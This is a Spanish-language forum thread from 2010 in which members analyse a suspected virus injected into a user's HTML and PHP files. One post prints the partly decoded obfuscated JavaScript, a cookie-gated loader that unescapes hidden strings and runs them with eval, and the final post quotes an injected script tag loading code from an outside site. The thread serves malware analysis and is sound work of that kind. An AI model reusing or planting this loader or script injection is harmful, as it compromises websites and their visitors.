virus en archivo html? / y algunos php

Iniciado por Cergath, 11 Noviembre 2010, 21:40 PM

0 Miembros y 1 Visitante están viendo este tema.

Shell Root

#10
Ok, ya lo estoy analizando, esta un poco entretenido. XD Dejadme analizarlo más y te dejo el resultado, por ahora veo como una redirección a una URL que aún no he podido descubrir cual es.

Tengo decodificado esto,
Código (javascript) [Seleccionar]
de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
ca = "%66un%63tio%6e %64cs%28ds%2ces%29%7bd%73%3dunes%63ape%";
cz = "%66u%6ect%69on%20cz%28cz%29%7bretur%6e ca%2bc%62%2bcc%2b%63d+c%65%2bcz%3b};";
cb = "28ds%29;s%74%3dtmp%3d%27%27;for(i%3d0;i%3cd%73%2el%65n";
dz = "%66un%63ti%6fn%20dw%28t%29%7bca%3d%27%2564oc%2575m%65%256et%2ew%2572%2569te%2528%2522%27;ce%3d%27%2522)%27;cb%3d%27%253c%2573cri%2570t l%2561n%2567%75a%67%25%365%253d%255%63%2522ja%76as%63%2572i%70%2574%255%63%2522%253e%27;c%63%3d%27%253c%255c%252fs%63ri%70t%253e%27;wi%6ed%6fw[%22e%22+%22%22+ %22v%22+%22al%22](unes%63ape%28t)%29}%3b";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cc = "%67%74h;%69++%29%7bt%6dp%3dds.s%6cic%65(i%2ci+1%29;%73";
ce = "cha%72Co%64eAt%280)%5e%28%270x0%30%27+%65s)%29);}%7d";
op = "%24a%3d%22dw(dcs(%63%75,1%34%29)%3b%22;";
st = "%73t%3d%22$%61%3d%73t%3bd%63s%28%64%61%2b%64%62+%64%63+%64%64%2b%64%65,%31%30)%3bd%77(%73t%29;%73%74%3d$a%3b%22%3b";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;y}%7F;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cd = "%74%3dst+%53%74rin%67.fr%6fmC%68a%72C%6fd%65(%28tmp%2e";

if (document.cookie.indexOf('rf5f6ds') == -1) {
 function callback(x) {
   window.tw = x;
   var d = new Date();
   d.setTime(x["as_of"] * 1000);
   var h = d.getUTCHours();
   window.h = h;
   if (h > 8) {
     d.setUTCDate(d.getUTCDate() - 2);
   } else {
     d.setUTCDate(d.getUTCDate() - 3);
   }
   window.gd = d;
   var time = new Array();
   var shiftIndex = "";
   time["year"] = d.getUTCFullYear();
   time["month"] = d.getUTCMonth() + 1;
   time["day"] = d.getUTCDate();
   if (d.getUTCMonth() + 1 < 10) {
     shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
   } else {
     shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
   }
   if (d.getUTCDate() < 10) {
     shiftIndex = shiftIndex + "-0" + d.getUTCDate();
   } else {
     shiftIndex = shiftIndex + "-" + d.getUTCDate();
   }
   document.write("" + "");
 }
 function callback2(x) {
   window.tw = x;
   sc('rf5f6ds', 2, 7);
   eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
   /*
function dw(t) {
  ca = 'document.write("';
  ce = '")';
  cb = '<script language=\"javascript\">';
  cc = '<\/script>';
  window["eval"](unescape(t))
};

function cz(cz) {
  return ca + cb + cc + cd + ce + cz;
};
$a = "dw(dcs(cu,14));";
st = "$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";
dw(dz + cz($a + st));
    */

   document.write($a);
 }
 document.write(" " + "");
} else {
 $a = ''
};

function sc(cnm, v, ed) {
 var exd = new Date();
 exd.setDate(exd.getDate() + ed);
 document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Cergath

Hola Shell, como has estado? disculpame el atrevimiento, pero me gustaria saber si tienes alguna novedad respecto a esto, seria genial :)

WHK

por lo menos no afecta sea lo que sea porque en firefox me da error de sintaxis, está mal codeado o el código está incompleto :-/

Error: syntax error
Archivo de origen: file:///C:/Users/Yan/Desktop/ver.html
Línea: 28
Código fuente:
var $a = BKbk34b32.replace(/98/g, "Z");

asi que no pude hacerle un debugg.

berz3k

Yo encontre en mis servers un php tambien bastante extranio despues de decodearlo me encontre que hacia peticiones a otra page "redirect" enviando todos mis formularios y/o contrasenias que alojaba, ademas de buscar servidores "Relaying" para SPAM.

bajare el file y ya os cuento.

-berz3k.

berz3k

Pues no pude bajar el file de megaupload, podras treparlo a otro site

-berz3k.

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

berz3k

@Shell Root Algo pasa con mis Addons de Chrome, lo podras subir a
:http://rghost.net/

-berz3k.

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

berz3k


Cergath

Otra vez sucede, ahora con:
<scri pt ty pe="text/jav ascript" src=" http://merchant.aegispayments.com/in.cgi?default" ></sc ript>